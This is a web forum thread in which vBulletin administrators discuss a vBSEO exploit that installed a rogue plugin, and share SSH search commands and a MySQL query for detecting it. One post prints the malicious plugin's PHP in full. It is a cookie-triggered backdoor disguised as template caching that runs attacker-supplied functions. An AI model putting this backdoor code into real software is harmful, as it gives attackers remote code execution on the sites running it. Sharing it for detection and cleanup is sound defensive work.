Originally posted by bill preston
View Post
Announcement
Collapse
No announcement yet.
sql database error and links changed to red?
Collapse
X
-
I've applied the fix that vBSEO recommends, but I'm wondering if that will address the SQL issue people are having here with "pluginlist". Yesterday I noticed a random plugin got installed with hacky looking code, which vBSEO says this their patch will fix, but does it fix the datastore issue too?Ken Iovino
Full Time PHP, Ruby and iOS Developer
Comment
-
AlpineZone, if you can connect to your server using SSH, you can do a search for the file using the 'locate' or 'grep' command.
Code:locate functions_vbseocp_abstract.php
Code:grep -r "proc_deutf" *.php
Ken Iovino
Full Time PHP, Ruby and iOS Developer
Comment
-
Im having the same problem you guys are.. the SAME thing..millions of error emails.. etc..I am simply an admin.. I know how to manage the forum and add users etc.. nothing with settings etc as I had that alll done for me..what are we going to do to fix this? Is there any vbulletin moderators on here to help out with this obvious mass problem?
Comment
-
Just so people know, you can quickly check if your site has been hit with vBSEO's exploit by running this mysql query:
Code:select title, hookname, phpcode from plugin where phpcode like "%vbauth%"
PHP Code:/* vBulletin Templates Cookie Caching */
$vbr="jnegaecq";$vbh="c33794aa91e3ec5bb71dd7a85f280d55";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
http://www.vbseo.com/f5/vbseo-securi...83/#post325546Ken Iovino
Full Time PHP, Ruby and iOS Developer
Comment
-
Originally posted by downeastboat View PostIm having the same problem you guys are.. the SAME thing..millions of error emails.. etc..I am simply an admin.. I know how to manage the forum and add users etc.. nothing with settings etc as I had that alll done for me..what are we going to do to fix this? Is there any vbulletin moderators on here to help out with this obvious mass problem?
http://www.vbseo.com/f5/vbseo-securi...83/#post325546Ken Iovino
Full Time PHP, Ruby and iOS Developer
Comment
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Comment